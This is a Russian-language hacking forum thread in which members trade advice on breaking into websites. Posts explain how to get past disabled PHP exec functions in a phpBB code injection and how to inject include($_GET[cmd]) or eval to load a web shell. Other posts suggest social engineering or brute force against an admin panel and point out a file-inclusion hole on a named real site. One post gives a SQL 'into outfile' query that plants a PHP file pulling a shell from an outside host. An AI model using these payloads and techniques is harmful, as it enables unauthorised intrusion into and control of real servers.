Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    laedafess

    Не канает
    Подредактировал скрипт чуть (так как ты не правильно написал чуток)
    При заходе на страницу (без GET запроса)
    Пишет:


    Warning: shell_exec() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1

    Warning: system() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1


    А если переходить вместе с GETом то идет редирект на главную страницу форума
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Ну значит отключены ф-кции.
     
  3. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    mailbrush ну так это то ясно что отключенны функции
    я имею ввиду есть еще какие нибуть методы?
     
  4. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    У меня похожая ситуация, при подстановке system($_GET[cmd]) ничего не выходит, хотя функции включены...
     
  5. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    в общем там сейф мод=он
    попробуй другие функции, например passthru.(хотя скорее всего тоже не пройдет)
    ищи способы обхода сейф мода(в гугл с запросом safe_mode bypass )

    хотя, имхо, тебе еще рано.
     
  6. _FallenAngel_

    _FallenAngel_ New Member

    Joined:
    21 Feb 2009
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Я знаю акк админа на одном сайте созданым на юкоз,можно ли с помощью его както взломать панель управления?
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Можно. СИ / Брут.
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    geezer.code, нет, там как бэ не сейф мод, если бы был сейф мод - пшп ругался бы на то что включен сейф мод, а пшп ругается что отключены функции
    Warning: shell_exec() has been disabled for security reasons

    Вообще тут надо пробовать другие системные функции, типа popen или passthru
    а вообще лучше залить гифку с полноценным шеллом, вместо
    'phpbb:system($_GET[cmd])'
    вставить
    ='phpbb:include($_GET[cmd])'
    и его проинклудить. А там уже можно посмотреть какие функции отключены и если отключены все функции позволяющие выполнять команды, пробовать залить перловый шелл с штацессом
    вот, удачке в хэке =)
     
  9. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Лучше eval, т.к. удалённый инклуд тоже может быть запрещён.
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Qwazar, я про удалённый инклуд и не говорил)
    так как он в админке пшпбб, то там наверника есть способ залить картинку
     
    1 person likes this.
  11. none222

    none222 Guest

    Reputations:
    0
    а ещё лучше echo =)

    echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
     
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval.

    P.S.
    И работает она не как passthru(), а как shell_exec().
     
    #6852 Qwazar, 3 May 2009
    Last edited: 3 May 2009
    1 person likes this.
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On

    Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции:

    chgrp include require
    chmod link rmdir
    chown passthru symlink
    exec popen system
    fopen readfile unlink
    file rename

    Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)
     
  14. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Как при имеющимся доступе в PMA залить нормальный шелл, а не это.
     
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
     
  16. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вопрос:

    http://wow.alania.net/?page=guilds&id=-7'

    Это инъекция???
     
  17. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    geforce нет
    но тут
    http://wow.alania.net/?page=
    инклуд.
     
  18. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Это значит я туда могу shell загрузить?
     
  19. [x59]ReV

    [x59]ReV Banned

    Joined:
    3 May 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -10
    geforce
    Локальный инклуд... через него ты можеш прочитать любой фаил на серваке.
     
  20. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    А с каких пор при локальном инклуде можно прочитать любой файл на серве?
    При инклуде можно проинклудить файл, выполнив в нём код, а не прочитать, это далеко не одно и тоже.
    Не надо путать людей, а то что можно просмотреть содержимое файлов без пхп кода - это не равносильно читалке файлов.
     
Thread Status:
Not open for further replies.